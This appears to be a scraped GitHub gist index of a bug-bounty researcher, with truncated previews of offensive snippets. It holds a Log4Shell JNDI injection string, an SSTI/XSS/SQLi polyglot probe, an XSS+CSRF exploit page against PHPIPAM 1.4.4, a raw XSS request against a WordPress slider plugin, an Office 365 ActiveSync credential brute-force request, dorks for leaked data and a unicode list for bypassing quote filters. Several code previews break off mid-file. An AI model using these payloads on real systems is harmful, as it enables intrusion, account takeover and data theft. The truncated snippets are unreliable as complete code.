:shipit:
./../../../../../${jndi:ldap://127.0.0.1#{{${hostName}.{lol}}}/{{random}}}

(inc0gbyt3) incogbyte
@incogbyte
incogbyte / base64PassGen.py
Created February 15, 2022 14:05
Small script to generate base64 passwords like, admin:admin
import os
import sys
import base64
'''
Small script to generate base64 passwords like, YWRtaW46YWRtaW4=
usage
@incogbyte
incogbyte / polyglotFinder.txt
Created February 28, 2022 13:36
payload finder polyglot ssti,xss,sqli
${{<%[%'"}}%\.vult00
@incogbyte
incogbyte / wordpress_downloader.py
Created July 29, 2022 14:34
download plugins for wordpress
from shutil import ExecError
import requests
from bs4 import BeautifulSoup
import os
import wget
from concurrent.futures import ThreadPoolExecutor
import zipfile
def wordpress_plugin():
    urls = []
@incogbyte
incogbyte / exploit.html
Created January 18, 2022 17:44
XSS + CSRF - PHPIPAM Version 1.4.4
<html>
<body>
<h1> Exploit PHPIPAM </h1>
<p><strong> By: Incogbyte </strong></p>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php" method="POST">
<input type="hidden" name="container" value="body" />
<input type="hidden" name="placement" value="top" />
<input type="hidden" name="sectionid" value="2&apos;&gt;&lt;input&#32;onpointerleave&#61;&quot;alert&#40;1&#41;&quot;&gt;incogbyte&lt;&#47;input&gt;&lt;script&gt;alert&#40;&apos;incogbyte&apos;&#41;&lt;&#47;script&gt;" />
<input type="hidden" name="original&#45;title" value="Search&#32;for&#32;free&#32;subnets&#32;in&#32;section&#32;" />
@incogbyte
incogbyte / request.md
Last active December 11, 2022 11:49
xss huge-it v4.0.8
POST /wp-admin/admin.php?page=hugeit_slider HTTP/1.1
Host: localhost:8000
Content-Length: 53
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8000
@incogbyte
incogbyte / options_brute_microsoft.md
Last active December 20, 2022 12:21
options_brute_microsoft
OPTIONS /Microsoft.Server-ActiveSync
Host: outlook.office365.com
Connection: Close
MS-ASProtocol: 14.0
Content-Length: 0
Authorization: Basic usermail:pass
@incogbyte
incogbyte / dorks.txt
Created July 11, 2022 12:51
small google foo, search info about targets domains.txt
"site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:repl.it | site:justpaste.it | site:pastebin.com | site:jsfiddle.net | site:trello.com | site:.atlassian.net "target" "
@incogbyte
incogbyte / juicy.sh
Created January 9, 2020 15:14
fast juicy files with tomnomnom wordlist and ffuf tool
#!/bin/sh
#tomnomnom juicy files https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51
# ffuf tool https://github.com/ffuf/ffuf
# put the ffuf bin at /usr/local/bin and give the juicy.sh permission to execute with chmod +x juicy.sh and copy to
# /usr/local/bin too.. after that.. execute juicy.sh at any terminal.
# usage bash juicy.sh filename.txt
filename="$1"
while read -r line; do
name="$line"
@incogbyte
incogbyte / burpsuitePassThrough.txt
Created April 7, 2023 20:26
Burp Proxy Pass Through
Burp Suite > Proxy > Options > TLS Pass Through.
Add these:
.*\.google\.com
.*\.gstatic\.com
.*\.mozilla\.com
.*\.googleapis\.com
.*\.pki\.goog
@incogbyte
incogbyte / unincodes.txt
Created May 1, 2023 12:08
List of useful unicodes to bypass some filters
#### unicodes - single quote
%u0027
%u02b9
%u02bc
%u02c8
%c0%27
%c0%a
%e0%80%a7